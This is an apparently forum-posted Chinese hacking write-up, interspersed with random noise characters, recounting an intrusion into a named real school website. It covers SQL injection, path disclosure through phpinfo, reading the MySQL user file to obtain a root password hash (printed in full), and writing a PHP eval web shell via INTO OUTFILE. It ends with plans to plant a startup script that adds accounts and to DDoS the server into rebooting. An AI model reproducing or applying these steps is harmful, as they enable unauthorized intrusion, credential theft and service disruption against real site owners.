第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏2 O4 ^% B) W/ M% Z9 J/ c* j
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!0 \6 S- d/ K6 a7 a' k1 B1 U
* o \0 Q! [- `& s0 a. `
& J* k. @2 U7 P* w {' I
" G/ @; m* V' f8 R& R; ^常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 ; X# f/ s* t# l7 e: _) e% i
+ _ A0 C% Y# P* o1 F2 J那么想可以直接写入shell ,getshell有几个条件:
% k8 }+ `( F" O3 y7 u" n1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF ! [ `0 B7 i+ h/ _6 @& P: ?/ ?
% n. S5 n# ^/ \# p+ t试着爆绝对路径:
) o: B% Y& D [+ n* D# T9 u1./phpMyAdmin/index.php?lang[]=1
7 M6 J$ k$ `+ p% L2./phpMyAdmin/phpinfo.php ; }5 o2 k# G n7 O J
3./load_file()
7 j, W0 d( l8 j' d L0 x; k4./phpmyadmin/themes/darkblue_orange/layout.inc.php & p; Q0 s" B" D& k# e5 ~
5./phpmyadmin/libraries/select_lang.lib.php , J) T$ ]9 w4 V7 X/ ^/ X" O
6./phpmyadmin/libraries/lect_lang.lib.php 4 F0 ] q. R+ ^( c+ e
7./phpmyadmin/libraries/mcrypt.lib.php ( e" A/ p$ _& _( Z8 e- V
8./phpmyadmin/libraries/export/xls.php % B- t1 R8 g8 v, n z. B4 p
4 z0 E* p* j1 q: V" y3 |7 c* P
均不行........................... , H( d, A; y$ Q, U9 r0 r6 Q4 D
& y" D, {+ T( O; R2 W御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php ( [, l+ _9 c5 q* ~# T; k% X7 F
9 z! F0 j2 C) v4 f- ^: d权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
0 ^2 F$ y( v- v, l- G' t# q
2 _$ |: L6 t P7 r默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 - S4 y4 o/ g5 Y
) c1 T0 A2 D; K7 o1 Y敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 5 L7 l, u. w1 w, H
& w* N, e9 d7 [+ ?( P7 B$ f, t
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell + ^5 O- C3 K; I. g. _2 ]- ?
0 S+ p$ k {1 G/ s0 C% ghttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini ' ^: i: R& J- J P4 \# k
& [: `! S8 M1 F; G* Z8 V
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 4 j* T9 B+ X- |% i6 [
2 b6 ^& E1 n, ?; k5 Q# d) G成功读到root密码: 5 `( ?& I# J6 ]2 r: C
' q! W2 I# o! X( m7 B
17---- r(0072)
' r- W; c/ }) c V* p* L; q18---- o(006f)
* y8 p% b. ^7 b6 E9 |( M19---- o(006f)
, H$ s& `/ x! y" ^20---- t(0074)
1 Y0 I* i5 r1 O2 C, t" N: G/ R21---- *(002a) 6 m+ B3 W& S! \% J# ]
22---- 8(0038)
2 U$ u' q8 S) L23---- 2(0032) * v ]8 S8 n ]: m
24---- E(0045) $ j! Z; o! t3 F/ L F
25---- 1(0031) , S; ^" U- H I- K% r+ X# O
26---- C(0043) " m5 Y+ h; d, }8 A2 I* S
27---- 5(0035) $ R$ z. R$ v3 q- E! i( U- O2 A7 Z
28---- 8(0038) 5 }4 A7 }& J8 Q# u* o' Z# ]+ p
29---- 2(0032)
/ P- o: H1 W/ W1 |30---- 8(0038)
/ n7 ^) Q; U/ C1 }2 Q3 O6 c$ c. l3 a31---- A(0041)
- A' j1 F3 a* R/ h7 R8 G+ n8 k0 D32---- 9(0039)
8 X z$ V% w9 ~- O33---- B(0042)
- g6 n6 {4 Q( w4 Q, P% {+ z8 `34---- 5(0035)
) m. o* e% ^# o0 H) k; ~' ~35---- 4(0034) % l( b- I/ _# j4 w: l
36---- 8(0038) * h( F2 N8 q1 n% E K2 f5 F3 y
37---- 6(0036) + V( G+ x* k4 n3 N
38---- 4(0034) . d6 A, f+ n+ e! o
39---- 9(0039) $ ?6 C/ A# a% T1 U
40---- 1(0031)
8 R2 @0 P* }% Y% h+ |" N! l41---- 1(0031) 2 c+ B, k& l- [- r& ]3 ^! \2 V
42---- 5(0035)
# Z$ k7 Y" Z- _5 d4 N6 T43---- 3(0033) 5 t3 u5 P0 @( Y6 Q8 j' a
44---- 5(0035)
, i3 z# z; B1 I45---- 9(0039)
* [- P$ I K7 O0 H U( Q46---- 8(0038) " I- C1 I1 c) q0 u, S" a9 r, T
47---- F(0046)
3 K1 F& l9 B. m: V48---- F(0046)
! e' I* d! J) x! m/ K+ u49---- 4(0034) ! Q7 `+ w7 t4 b8 v% F6 z1 w4 I
50---- F(0046) R3 V& r4 g- A
51---- 0(0030)
* Q- g |5 t: v52---- 3(0033) 4 w9 h* ^, Z) a) S
53---- 2(0032) + B" T6 m! A1 o4 {
54---- A(0041) : o3 P3 N) ~6 Q9 ~# \& ` l
55---- 4(0034)
, y/ d: O) s. V p2 k( q56---- A(0041)
) X( h$ Z$ C @4 F1 a; R" {9 ^/ {57---- B(0042) v6 } Z: }+ y9 d* t% ?6 I
58---- *(0044)
9 ~# H* k/ _+ y. j/ _! t* Q. _! ]% u59---- *(0035) 1 _1 ~( c" H' U8 d3 I, _. N" L
60---- *(0041)
3 O3 ~: o0 E8 ~+ V61---- *0032) % Q* ^7 X7 ^; P% M% o" M
. \+ }6 b6 z; c2 v解密后成功登陆phpmyamin ( y, D. ~! `/ q% p) s U
9 F' |1 `5 c( h' j. N; }
[- r# h4 N- o: w
r" F+ c- s. ]: b0 L: V( a
$ g9 E* q: z, Y6 Q找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
/ B; l6 Q5 ~" F! j# x/ [) N" v# ~" v0 h v+ U
成功执行,拿下shell,菜刀连接:
& ]! f4 R8 f0 ^* z7 @. K5 d* s' J7 \7 w( }
服务器不支持asp,aspx,php提权无果................... # ~) F" ]: V0 |7 g4 a
9 d" Y6 H* V4 f4 j8 h' H, t+ o S
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
+ N8 r1 t5 ^( v. Y" B3 ?- O服务器上已经有个隐藏帐号了 1 B8 Y M* @9 T5 ]& L) u
别名 administrators [: _, r, |6 B3 t1 C7 g
注释 管理员对计算机/域有不受限制的完全访问权
h0 i# V& L$ S5 d1 G' a成员 6 A4 H T4 \0 q* k3 q; O2 C
-------------------------------------------------------------------------------& w4 @8 L7 H4 f6 D
admin
0 K y: c; W" ^* n/ m. `Administrator2 ^0 l2 K! X4 W# m/ H3 P" V
slipper$3 F8 A3 W' x& \% B5 X
sqluser3 c$ V7 a3 P8 H: b6 S, R' @
命令成功完成。 , ~+ h4 G9 e8 e- @5 \/ @. O( H
. |. O# O ]! x" d2 K; s1 {服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。* e9 C* ~1 [! i: P) {
: {% ~5 o* ?9 l m& }8 fddos服务器重启,不然就只能坐等服务器重启了...............................
* _, s! t& P' [; J3 e/ H N$ I9 `5 D
$ n* T# j8 P, [ |